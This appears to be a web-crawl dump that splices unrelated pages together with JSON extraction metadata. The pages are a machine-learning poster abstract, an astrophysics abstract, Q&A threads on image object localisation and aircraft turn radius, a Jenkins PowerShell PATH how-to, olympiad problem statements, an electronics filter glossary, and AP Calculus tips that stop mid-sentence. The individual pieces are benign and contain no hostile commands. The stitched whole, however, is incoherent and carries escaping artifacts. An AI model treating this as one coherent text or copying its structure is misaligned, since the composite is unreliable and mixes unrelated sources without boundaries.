{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7961487174034119, "perplexity": 4346.186714804028}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-47/segments/1573496669868.3/warc/CC-MAIN-20191118232526-20191119020526-00074.warc.gz"}
|
https://nips.cc/Conferences/2020/ScheduleMultitrack?event=18974
|
`
Timezone: »
Poster
Outlier Robust Mean Estimation with Subgaussian Rates via Stability
Ilias Diakonikolas · Daniel M. Kane · Ankit Pensia
Tue Dec 08 09:00 AM -- 11:00 AM (PST) @ Poster Session 1 #519
We study the problem of outlier robust high-dimensional mean estimation under a finite covariance assumption, and more broadly under finite low-degree moment assumptions. We consider a standard stability condition from the recent robust statistics literature and prove that, except with exponentially small failure probability, there exists a large fraction of the inliers satisfying this condition. As a corollary, it follows that a number of recently developed algorithms for robust mean estimation, including iterative filtering and non-convex gradient descent, give optimal error estimators with (near-)subgaussian rates. Previous analyses of these algorithms gave significantly suboptimal rates. As a corollary of our approach, we obtain the first computationally efficient algorithm for outlier robust mean estimation with subgaussian rates under a finite covariance assumption.
|
2021-11-29 02:57:56
|
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8781417608261108, "perplexity": 1276.10865620849}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-49/segments/1637964358685.55/warc/CC-MAIN-20211129014336-20211129044336-00130.warc.gz"}
|
http://www.astroscu.unam.mx/massive_stars/submission/2006/06070713424.htm
|
## Supersonic turbulence in shock-bound interaction zones I: symmetric settings
Doris Folini (1), Rolf Walder (2,3)
1 - Institute of Astronomy, ETH Zurich, Switzerland
2 - Observatoire de Strasbourg, 67000 Strasbourg, France
3 - Max-Planck-Institut fur Astrophysik, 85741 Garching, Germany
Colliding hypersonic flows play a decisive role in many
astrophysical objects. They contribute, for example, to molecular
cloud structure, the X-ray emission of O-stars, differentiation of
galactic sheets, the appearance of wind-driven structures, or,
possibly, the prompt emission of $\gamma$-ray bursts. Our intention
is the thorough investigation of the turbulent interaction zone of
such flows, the cold dense layer (CDL). In this paper, we
focus on the idealized model of a 2D plane parallel isothermal slab
and on symmetric settings, where both flows have equal parameters.
We performed a set of high-resolution simulations with upwind Mach
numbers, $5 < M_{\mathrm{u}} < 90$.
We find that the CDL is irregularly shaped and has a patchy and
filamentary interior. The size of these structures increases with
$\ell_{\mathrm{cdl}}$, the extension of the CDL. On average, but not
at each moment, the solution is about self-similar and depends only
on $M_{\mathrm{u}}$. We give the corresponding analytical
expressions, with numerical constants derived from the simulation
results. In particular, we find the root mean square Mach number to
scale as $M_{\mathrm{rms}} \approx 0.2 M_{\mathrm{u}}$. Independent
of $M_{\mathrm{u}}$ is the mean density, $\rho_{\mathrm{m}} \approx 30 \rho_{\mathrm{u}}$. The fraction $f_{\mathrm{eff}}$ of the upwind
kinetic energy that survives shock passage scales as
$f_{\mathrm{eff}}= 1 - M_{\mathrm{rms}}^{-0.6}$. This dependence
persists if the upwind flow parameters differ from one side to
the other of the CDL, indicating that the turbulence within the
CDL and its driving are mutually coupled. In the same direction
points the finding that the auto-correlation length of the confining
shocks and the characteristic length scale of the turbulence within
the CDL are proportional.
In summary, larger upstream Mach numbers lead to a faster expanding
CDL with more strongly inclined confining interfaces
relative to the upstream flows, more efficient driving, and finer
interior structure relative to the extension of the CDL.
Reference: Astronomy and Astrophysics
Status: Manuscript has been accepted
|
2017-11-20 15:26:51
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.729914128780365, "perplexity": 4053.917193941988}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-47/segments/1510934806070.53/warc/CC-MAIN-20171120145722-20171120165722-00583.warc.gz"}
|
https://ai.stackexchange.com/questions/15479/get-the-position-of-an-object-out-of-an-image
|
# Get the position of an object, out of an image
I have some images with a fixed background and a single object on them which is placed, in each image, at a different position on that background. I want to find a way to extract, in an unsupervised way, the positions of that object. For example, us, as humans, would record the x and y location of the object. Of course the NN doesn't have a notion of x and y, but i would like, given an image, the NN to produce 2 numbers, that preserve as much as possible from the actual relative position of objects on the background. For example, if 3 objects are equally spaced on a straight line (in 3 of the images), I would like the 2 numbers produced by the NN for each of the 3 images to preserve this ordering, even if they won't form a straight line. They can form a weird curve, but as long as the order is correct that can be topologically transformed to the right, straight line. Can someone suggest me any paper/architecture that did something similar? Thank you!
• By fixed, you mean the background is always the same image ? Sep 17, 2019 at 4:35
• @Astariul yes! and the object that changes position is also the same in each image (same size, shape, orientation etc.). Sep 17, 2019 at 5:45
• @Silviu-MarianUdrescu you mightn't need machine learning for this, it sound's like the object is very defined. If you can code something up that works 100% of the time why not do that? Sep 17, 2019 at 6:09
• @Recessive Ideally I want a NN that is able to learn the 2 numbers representation of an image, for any set of background and object moving. Coding it by hand works for only a fix background and a fix image (which is indeed what my post is about), but I want a NN approach so I can later generalize i.e. if I pass a new set of images (all with the same background and object, but different from the ones in the previous set of images) the NN would identify the "x" and "y" just as easily without any coding modifications. Coding something up manually would require a new code for each set of images. Sep 17, 2019 at 6:15
• @Silviu-MarianUdrescu There should be a few ways of doing this. You could create a regression CNN that outputs (x,y) coordinates (i wouldn't recommend this, it's very hard to get this to work from my experience). You could use deconvolutional layers to produce an output image of similar dimensions to the input image, using a softmax on the entire image to produce a probability of the image being at each location (you could also produce a downscaled version if approximate location is ok). Other then that I think there's so great resources online for object detection, just google search. Sep 17, 2019 at 6:29
## 1 Answer
As said in the comments, I wouldn't use Machine Learning for that.
You can achieve that result using something like OpenCV.
For example:
1. Get the "Naked" Background image: If you don't have it, you can easily calculate it by making an average of each image: background = np.mean(images, axis=0)
2. For each image, calculate the pixel difference between image and background. diffs = [img - background for img in images]
3. Diff's pixels can be negative, so take the absolute value of each pixel before converting it to grayscale.
4. If all goes well, you now have a dark noised image, with a bright silhouette of your object.
5. Set a threshold (i.e. threshold = diff.percentile(95)) and make a binary mask, so now each pixel indicates 1 for image silhouette and 0 for background.
6. Find the centroid of the object (like calculating the average coordinates for each pixel=1). And there you have it!
Of course, I just described one clear and easy way to do it. But you can find your own best solution.
• ✅ Don't need to train a neural network
• ✅ Don't need to label data
• ✅ Works for any set of image / background
• ✅ Precise coordinates
• ✅ Easy to make, debug and adapt.
• ✅ Runs fast
|
2023-04-02 09:46:54
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.629831850528717, "perplexity": 685.629260383983}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296950422.77/warc/CC-MAIN-20230402074255-20230402104255-00601.warc.gz"}
|
https://support.cloudbees.com/hc/en-us/articles/360010917872-How-to-configure-the-Powershell-path-environment-variable-on-a-Windows-agent-when-using-declarative-pipeline
|
# Issue
• When running a Windows agent connected to a CloudBees Jenkins controller, you may want to set the Powershell path environment variable in order to execute specific commands on the agent.
# Resolution
When setting the Powershell path from a declarative pipeline, one option is to call a batch file from the pipeline. Here is an example stage which calls a batch file:
``````stage('Run Tests') {
steps {
bat 'powershell -noexit "& "".\\run-tests.ps1"""'
}
}
``````
The Powershell path can then be set from within the Powershell script. An example of the contents of the run-tests.ps1 file are below:
``````\$env:path = "\$env:path;C:\selenium\geckodriver-v0.21.0-win64;C:\Program Files\nodejs"
npm install
node run-selenium-tests.js
``````
In the above example, the \$env:path is appended with a folder containing the selenium geckodriver as well as the path to a nodejs installation.
Have more questions?
#### 0 Comments
Please sign in to leave a comment.
|
2022-07-04 15:45:42
|
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8204890489578247, "perplexity": 6806.851941576462}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-27/segments/1656104432674.76/warc/CC-MAIN-20220704141714-20220704171714-00111.warc.gz"}
|
https://aviation.stackexchange.com/questions/67842/how-can-i-get-lead-point-for-aircraft-to-intercept-final-course
|
# How can I get 'lead point' for aircraft to intercept final course?
As controller, I always wonder when should I instruct aircraft to turn. The aircraft does not turn at right angles as soon as instructed, but rather has turning radius. So, I tried to find the formula but failed.
If speed of aircraft is 300 kts, and he is instructed to make 90 degree, how long distance the aircraft need to turn? I make image, and I wonder the formula for 'x'
• Is that 300 kts airspeed or groundspeed? At what altitude does the aircraft make the turn? – DeltaLima Aug 19 '19 at 7:19
• I didn't consider those things as factor. For exeample, altitude is 5,000ft and ground speed. And I also want to know the fomula for 30degree or other random degree case. Thanks. – Min Aug 19 '19 at 12:04
Standard turn rate is 360° in 2 minutes so a 90° turn will take half a minute (30 s). The distance covered will be $$s = \frac {v}{60 \times 2} = \frac {v}{120}$$ (nautical miles).
The number you are looking for is the radius of the arc. This is given by $$s \times \frac {2}{\pi}$$ (nautical miles).
So the radius is given by $$r = \frac {v}{120}\times \frac {2}{\pi} = 0.0053 v$$. This is approximately $$\frac {v}{200}$$.
So for 300 kt the start turning would be $$\frac {300}{200} = 1.5$$ nautical miles from rollout.
I'm an engineer, not a pilot or controller, so wait for confirmation of my maths by someone who knows what they're talking about.
• I think your math is correct, but an aircraft traveling that fast under IFR will generally make half standard rate turns to avoid excessive angles of bank. The rule of thumb we used for a half standard radius was 1.0% of airspeed. So, 3nm at 300kias, 2.5nm at 250kias, etc. Avoids algebra while flying! ;) – Michael Hall Aug 18 '19 at 16:16
• That makes sense. You can post it as an answer. Thank you. – Transistor Aug 18 '19 at 16:30
• Thanks for answer. If the degree is 30, Could I get the lead point too? – Min Aug 19 '19 at 12:07
• @Transistor, I don't have time to verify against your formulas, but feel free to incorporate into your answer to make it more complete. – Michael Hall Aug 19 '19 at 17:29
• @Min, I will assume you are asking degrees of turn and not angle of bank. I am not sure if the math above supports this, but personally I would just divide by 3. For example, if I was doing 300 knots and using my rule of thumb of 3nm for a 90 degree turn, I would lead a 30 degree turn by about a mile. I would also recommend you confer with fellow controllers for advice on this matter. – Michael Hall Aug 19 '19 at 17:39
|
2020-07-15 05:55:46
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 5, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7170504927635193, "perplexity": 1104.9106597370996}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-29/segments/1593657155816.86/warc/CC-MAIN-20200715035109-20200715065109-00427.warc.gz"}
|
http://medalplus.com/?p=1914
|
# AIO2012 Solution(Chinese)
## NORT
It is the year 1982. Malcolm Fraser is the Prime Minister of Australia, you frequently listen to Down Under by Men at Work on your boombox and roller blading is the default mode of transport. As a budding computer scientist, you spend most weekends at the local arcade trying to top your score in the popular video game NORT.
NORT is played on a rectangular grid of square cells with H columns and W rows. You ride a light-bike through the grid, starting in the top-left corner cell. Each second, you can move your light-bike up, down, left or right to any of the four adjacent grid cells (as long as you don't go off the grid!). As you move, your bike's exhaust pipe creates an impenetrable wall of light in the cell you were previously in. If you ever move into a cell containing a wall of light (i.e. a cell you have travelled through before), your bike will disintegrate into pixels in a dramatic 8-bit explosion. The only exception is if you return to the top-left corner cell where you started, in which case the wall of light will be connected and your score for the game will be the total length of wall you have created.
Your goal is therefore to plan the longest possible route through the grid starting and ending in the top-left cell without ever passing through a cell more than once.
## Posters
You run a poster advertisement company. Your company is quite small: all it owns is a rectangular wall in the city. Advertisers pay to put up their poster on your wall at some time at some position along the wall. These posters may have different widths, but are all exactly the same height as the wall. When a poster is put up, it may cover some of the posters already on the wall.
You have a log of every single poster put on your wall: their distance from the left end, their width, and the time they were put up.
Since people always walk from the left to the right of your wall, and we all know advertisement posters are only effective when they are completely uncovered (e.g. a burger picture will only be mouthwatering if you see the whole burger), you would like to determine the leftmost fully visible poster
## Cabinet Shuffle
The polls are looking grim for the government of Absurdistan. Leadership speculation and high-profile scandals dominate popular current affairs shows Tomorrow This Morning and An Antiquated Event. In order to radically change public perceptions, the leaders plan to remove a ministry position and blame all the problems of the day on the ousted minister. At the same time, the other cabinet positions will be shuffled so as to portray a fresh, new face of government.
Naturally, the ministers can not agree between themselves who will be blamed and expelled, nor can they agree who will take which remaining ministry positions (including the position of Prime Minister). They decide to play a fair game of Musical Chairs to the tune of Party Rock Anthemin order to resolve these disputes.
There are K ministry positions available, each represented by a physical seat at a point around a circle. The K+1 ministers are also initially standing at points around the circle. Points on the circle are labelled clockwise from 1 to N, such that point 1 immediately follows point N. No two ministers will be initially standing at the same point, and no two chairs will be at the same point.
Each second, all the ministers who are still standing do the following (simultaneously):
• If the minister is standing at the same point as an empty chair, the minister will sit down in it.
• Otherwise, the minister will step one place clockwise around the circle to the next point. If the minister was previously at point i (with i < N), the minister will now be at point i+1. If the minister was previously at point N, the minister will now be at point 1.
Since there are K+1 ministers, eventually all K seats will be taken and the one minister remaining without a seat will be booted out and shamed by the media. Furthermore, the minister sitting in the first seat in the circle will have the place of Prime Minister. (The 'first' seat in the circle is defined as the first seat clockwise from point 1.)
Your task is to determine who will be Prime Minister and who will be expelled from cabinet after the reshuffle. Note that your program can score half of the available marks for correctly answering only one of these questions, and will score full marks for correctly answering both.
## King Arthur II
It has been many years since King Arthur has held a meeting for the Knights of the Round Table. Despite his best efforts to arrange seating in order to minimise conflict between knights, the last meeting deteriorated into a chaos of insulting and duelling unfit for the honourable dining room of Camelot.
Arthur must bring his knights together again, for rumour has spread throughout the kingdom that the dragons are becoming restless. In order to avoid the disasters of the last meeting, Arthur has decided to hold two meetings instead of one, and ensure that no two knights who would likely duel each other are invited to the same meeting. Furthermore, since immediate anti-dragon action is required, Arthur would like to have as many knights as possible at the first meeting.
After making a long list of all the knights and all the pairs of knights who may duel if invited to the same meeting, Arthur has requested you as the Court Informatician to write a program determining the largest number of knights that can be invited to the first meeting such that no pair of knights likely to duel each other are invited to the same meeting. Merlin, in his infinite wisdom, has assured you that there is at least one way of dividing all the knights into two meetings without any chance of duelling at either meeting.
## Awesome Frog
The inaugural International Olympiad in Frogleaping is being held in Australia in 2013 and you are determined to win. While you want nothing to do with such slimy, jumpy creatures, you plan to enter a frog-like robot that you know will be faster than all the other organic entrants.
However, your frog has one minor incorrectable flaw--it is only able to jump one fixed distance. Specifically, it can only jump exactly K metres forward from its current location, even if this lands the frog in the water (where it will promptly short-circuit).
Since the initial lily pad positions may make it impossible for your frog to reach the last lily pad, you plan to create a distraction and move the lily pads so that they are spaced exactly K metres apart, enabling your frog to jump from the first to the last without falling in the water. Shifting a lily pad by one metre will take you one second, and the longer you spend stealthily moving lily pads, the more likely that the IOF judges will notice and disqualify you from the competition.
Given the initial distances between the lily pads in the course, you must write a program to compute the minimum time you will have to spend shifting lily pads such that all pairs of consecutive lily pads are exactly K metres apart. You can assume that the pond is sufficiently long so that the first lily pad can be moved any distance back, and the last lily pad can be moved any distance forward.
## 《AIO2012 Solution(Chinese)》上有1条评论
1. Pingback引用通告: 填坑计划一览表 | 一个沙茶的代码库
|
2018-04-23 03:25:40
|
{"extraction_info": {"found_math": true, "script_math_tex": 13, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 14, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2994212806224823, "perplexity": 1255.5393302057005}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-17/segments/1524125945724.44/warc/CC-MAIN-20180423031429-20180423051429-00475.warc.gz"}
|
https://www.kistler.com/en/glossary/term/filter-electronics/
|
# Filter (electronics)
## What is meant by filters and how do they influence the measurement signal?
In general, the term filter is understood to mean the blocking or passing of certain frequency ranges. In this way, a filter acts in the frequency domain. The cut-off frequency of the filter determines which content of the signal are cut off or allowed to pass.
## What is an idealised filter?
An idealised filter cuts off the measurement signal at a certain cut-off frequency or allows the measurement signal to pass above a certain cut-off frequency, whereby a clear separation of the required frequency range is created. The cut-off frequency separates the passband from the stopband of the filter.
## What is meant by "real filter"?
A real filter always has a transition range from the passband to the stopband in the range of the cut-off frequency. In the transition range, the frequency components are already attenuated, but not completely suppressed. The attenuation already begins at frequencies in the passband and continuously increases during the transition to the stopband until the frequency components are completely eliminated.
## What is the effect of a low-pass filter?
With a low-pass filter of, for example 150 Hz, all frequencies above 150 Hz are cut off. Thus, the signal is only passed in the frequency range up to the set cut-off frequency.
## What is the effect of a high-pass filter?
The opposite behaviour of a low-pass filter applies to the high-pass filter. If the cut-off frequency is set at 150 Hz, all frequencies above 150 Hz are transmitted.
## What is a band-pass filter?
With this type of filter, two cut-off frequencies must be defined because the band-pass filter is a combination of first a high-pass filter followed by a low-pass filter. As a result, a defined frequency band is considered. If the lower cut-off frequency is set at 150 Hz and the upper cut-off frequency at 300 Hz, the result is a frequency band between the two cut-off frequencies that passes.
## What is the effect of a bandstop filter?
Also often called a notch filter, the bandstop filter is a combination of a low-pass filter followed by a high-pass filter. This makes it possible, for example, to filter out certain frequency ranges in which interfering frequencies are present within a range. If the lower cut-off frequency is defined at 150 Hz and the upper cut-off frequency at 300 Hz, the frequencies in between are filtered.
## What is meant by filter orders?
The order of a filter defines the steepness in the transition range between passband and stopband. The higher the order of a filter, the steeper the transition range. An n. order has a steppness of n x 20 dB per frequency decade. The steepness of the transition range of a second order filter is 40 dB per frequency decade.
Higher order filters are obtained by connecting several filters in series. For example, if two second-order low-pass filters are connected in series, a fourth-order low-pass filter is created.
|
2022-10-01 10:48:16
|
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8168532848358154, "perplexity": 702.3036334972827}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00254.warc.gz"}
|
http://138.68.237.97/ap-calculus-tips/
|
Generic selectors
Exact matches only
Search in title
Search in content
Search in posts
Search in pages
# The Ultimate List of AP Calculus Tips
Learn the language and vocabulary, because half of the battle is knowing what a question is asking and/or telling you! Give yourself the benefit of analyzing the information presented in a question, because then you can execute on the knowledge and skills that you have practiced!
In order for you to score a 4 or 5 on the AP Calculus exam (AB or BC), it is important for you to follow the tips outlined below. So far in 2015, only 38.4% of students who took the AP Calculus AB exam received a grade of 4 or 5. However, 61.5% of students that took the AP Calculus BC exam in 2015 received a 4 or 5 score. The AP Calculus BC exam covers all of the topics in the AP Calculus AB exam plus some additional ones as well. Take the time to review the following tips and you’ll be well on your way to earning the highest possible score on your AP Calculus exam. Relax, read and absorb the tips as you go! Good luck!
We recommend you supplement your AP Calculus preparation with Albert’s online practice questions. If you prefer going old school, you can read about the best review books for AP Calculus here.
## How to Study for AP Calculus Exam Tips
1. Know the exam’s content: The AP Calculus exam will cover a number of specific concepts besides just differentiation (Derivatives) and integration (Integrals). See the following for a comprehensive list of topics and concepts covered in the exam:
List of Topics and Concepts on the AP Calculus Exam
#### – Integrals
Interpretations
Properties
Applications
Techniques
Numerical approximations
Definite
Indefinite
Areas under curve
Euler’s Method
Integration by parts
#### – Derivatives
Concept
At a point
As a function
Applications
Higher Order derivatives
Techniques
Max/Min problems
#### – Asymptotes
As Calculus is a systematic assembly of concepts, take the time to familiarize yourself with the terminology, and, more importantly, understand the actual concepts. Calculus is a highly conceptualized subject matter and it is extremely important that you have a firm grasp on all of the major concepts. Once you have mastered the individual concepts you are ready for the next step (Tip 2).
2. Practice makes perfect: In order to score a 4 or 5 on your AP Calculus exam you will need to practice lots of problems. The more problems you do, the more adept you will be at deciphering the way in which each type of problem is presented. There are numerous textbooks on calculus that are suggested study guides for students. Get one or two of these textbooks and start doing the problems in each chapter. You may also use online study guides for the same purpose. One such valuable resource is available at the Albert.io website. Do yourself a big favor and search for additional online resources as time permits. There are plenty of them! If you have extra time, we highly recommend visiting College Board’s AP Calculus course homepage.
3. Assess the exam and gauge your time appropriately: There are two multiple-choice and two Free-Response Question (FRQ) sections of the exam. Both the multiple-choice and FRQ sections are broken up into four separate time segments. You will have two segments where you will be allowed to use a calculator and two where you will not be allowed to use a calculator. For each FRQ (there are a total of six) your time allotment should be 15 minutes. Try your best to pace your time on these questions. Since there are a total of 45 multiple-choice questions and a total time of 105 minutes, you should pace yourself at two minutes per multiple-choice question. By skimming the exam before you start, you can quickly tackle the problems you feel the most comfortable with. Then, you can tackle the more difficult questions.
4. Pay attention to detail: Especially when working with the AP Calculus FRQs, it is important that you are detail oriented in solving the more complex problem of an FRQ. In other words, make sure that you detail every step in the process. For example, if they have two or three equations that require differentiation or integration at some point, then show this work in detail. You should draw a box around any important interim equations that you will need for figuring out the final answer. The picture below is an excellent example illustrating the use of this tip:
Also, make sure that your final answer to a FRQ is clearly identified as such. If you are having problems with a particular multiple-choice question use the process of elimination. Try your best to narrow down your answer to one or two of the multiple-choice selections. For example, if you know that the answer needs to be in the derivative form then you can eliminate any and all options containing the integral form.
5. Review and double-check your final answers: We cannot emphasize this tip enough. As time permits, always perform a quick review of an answer. OK, if you are so totally confident of a particular answer then don’t waste the time on re-checking its correctness. Move onto the next question and so on. For problems that you are not able to answer during your first skim, place a check mark or circle them so that it will be easy for you to find them later on during the exam. This will certainly be time well spent.
6. Review important trigonometric derivatives: Make sure that you know the common trigonometric derivatives and inverse trig derivatives. You will most definitely need them for many of the problems on the AP Calculus exam. Here is a list of the trig derivatives you should know by memory:
#### Inverse Trig Derivatives
$\frac{d}{dx}\sin{x}=\cos{x}$ $\frac{d}{dx}\arcsin{x}=\dfrac{1}{\sqrt{1-x^2}}$
$\frac{d}{dx}\cos{x}=-\sin{x}$ $\frac{d}{dx}\arccos{x}=\dfrac{-1}{\sqrt{1-x^2}}$
$\frac{d}{dx}\tan{x}=\sec ^2{x}$ $\frac{d}{dx}\arctan{x}=\dfrac{1}{x^2+1}$
$\frac{d}{dx}\cot{x}=-\csc^2{x}$ $\frac{d}{dx}\text{ arccot }{x}=\dfrac{-1}{x^2+1}$
$\frac{d}{dx}\sec{x}=\sec {x}\cdot \tan{x}$ $\frac{d}{dx}\text{ arcsec }{x}=\dfrac{1}{\left|x\right|\sqrt{x^2-1}}$
$\frac{d}{dx}\csc{x}=-\csc{x}\cdot \cot{x}$ $\frac{d}{dx}\text{ arccsc }{x}=\dfrac{-1}{\left|x\right|\sqrt{x^2-1}}$
7. Show all of your work: Make sure that when performing solutions to either the multiple-choice or FRQ problems that you show all your work. This is especially important for the FRQs as partial credit will apply. Multiple-choice questions do not have partial credit. They are correct or wrong, so there is no in-between.
8. Write down the equations: If you are using your calculator to solve an equation, be sure to write down the equation first. An answer without an equation may not get full credit even if it is correct. Also, if you use your calculator to find the value of a definite integral or derivative, write down the integral or derivative equation first.
9. Use your calculator only for the following: Graphing functions, computing numerical values for derivatives and definite integrals, and for solving complex equations. In particular, do not use your calculator to determine max/min points, concavity, inflection points, increasing/decreasing, domain, and range. (You can explore all these with your calculator, but your solution must stand alone in order to receive credit).
10. Know both the product and quotient rules for derivatives: These are some of the most frequently used rules in all of Calculus. You must know them well for the AP exam. We have always used the following to remember the product rule: The derivative of the product of two functions of the same variable is equal to the first function times the derivative of the second function plus the second function times the derivative of the first. Symbolically the product rule is:
$\dfrac{d}{dx}\left(g\left(x\right) h\left(x\right)\right)=g\left(x\right)\dfrac{d}{dx} h\left(x\right)+h\left(x\right)\dfrac{d}{dx}g\left(x\right)$
The quotient rule is more complex and can be memorized as follows:
If:
$f\left(x\right)=\dfrac{g\left(x\right)}{h\left(x\right)}$
…then:
$f'(x)=\dfrac{g'(x)h(x)-g\left(x\right)h'(x)}{{\left[h(x)\right]}^{2}}$
In words you can memorize the quotient rule as follows: The derivative of a quotient of two functions of the same variable is equal to the derivative of the top function times the bottom function MINUS the top function times the derivative of the bottom function ALL over the bottom function squared.
11. Indefinite Integrals: If you are ever asked to integrate a specific function always remember to add + C as part of the answer after the equal sign. Leaving it out will cost you points. For example, what is the integral of:
